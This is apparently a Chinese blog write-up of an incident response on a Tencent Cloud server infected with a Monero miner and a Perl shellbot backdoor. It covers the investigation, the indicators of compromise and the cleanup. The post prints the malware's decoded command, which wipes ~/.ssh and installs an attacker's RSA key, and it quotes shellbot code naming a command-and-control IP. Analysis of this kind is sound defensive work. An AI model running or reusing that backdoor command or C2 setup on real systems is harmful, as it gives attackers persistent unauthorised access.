记一次腾讯云服务器被【门罗币挖矿病毒和shellbot后门】攻击的排查处理
作者:互联网
和病毒战斗到底
收到病危通知单
自己用的腾讯云服务器,这是第二次被放入病毒了,太猖狂了。
这是腾讯云发的告警
吓得我赶紧登到服务器一查究竟
检查身体状况
top看一下能不能查到病毒的进程
很显然并没有看到病毒的进程,但是kswapd0这么高的CPU说实话在我的服务器上第一次出现占用这么高的CPI有点不正常。
查找病根
查看一下路径
该进程的真实文件地址
/home/test/.configrc/a/kswapd0
这里有个cron.d文件,说明木马病毒设置了定时计划
这里看到了/tmp/.X25-unix路径和腾讯云发的告警路径就匹配上了
这里有a目录和b目录,在b目录下发现了病毒真正的shell文件还是加密的
这个是a目录中的run
这个是b目录中的run
文件末尾标注了解密方式
base64 --decode
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh
这里是黑客的rsa公钥添加到指定目录
先去解密一下加密代码
好家伙,解密出来的还是四不像代码,从网上参考了相关处理方法,知道了这个病毒是基于Perl的
(一) 将代码开头eval改为print
(二) 创建文件ax.pl
(三) 把更改过的代码扔进去
(四) Perl ax.pl | less
没有perl环境 需要安装perl环境,如果嫌麻烦的话,找个Perl在线工具
my $processo = 'rsync'; #进程名 这个可不是系统进程rsync 系统进程rsync的进程名是rsyncd
$servidor='45.9.148.99' unless $servidor; #服务器的地址
荷兰的老毛子
/usr/bin/perl 这个没有问题
去看下/tmp目录下的东西
病毒的信息已经搜集的差不多了,下面开始清除
切除病根
首先干掉进程
[root@VM-0-8-centos ~]# kill 21509
我这里有一个test用户,是荷兰老毛子创建的。
切换到test用户 清除定时任务和ssh key内容
然后删除tmp目录下的缓存文件
[root@VM-0-8-centos ~]# rm -rf /tmp/.X25-unix/dota3.tar.gz /tmp/.X25-unix/.rsync/*
删除病毒文件
[root@VM-0-8-centos test]# rm -rf /home/test/.configrc
删除test用户
CPU使用率恢复了正常,raync进程也无了。
该病毒千变万化,种类繁多
/home/test/.configrc/* 病毒所在目录
/home/test/.ssh/ 病毒公钥
/tmp/.X25-unix/.rsync/* 病毒运行缓存文件
/tmp/.X25-unix/dota3.tar.gz 病毒压缩包
/home/test/.configrc/a/kwwapd0 病毒主程序
此病毒主要传播基于Perl的shellbot和门罗币挖矿木马
参考链接
https://blog.csdn.net/yinghua1234/article/details/107233580
标签:tmp,shellbot,门罗,X25,ssh,test,挖矿,目录,病毒 来源: https://blog.csdn.net/qq_16942727/article/details/117253247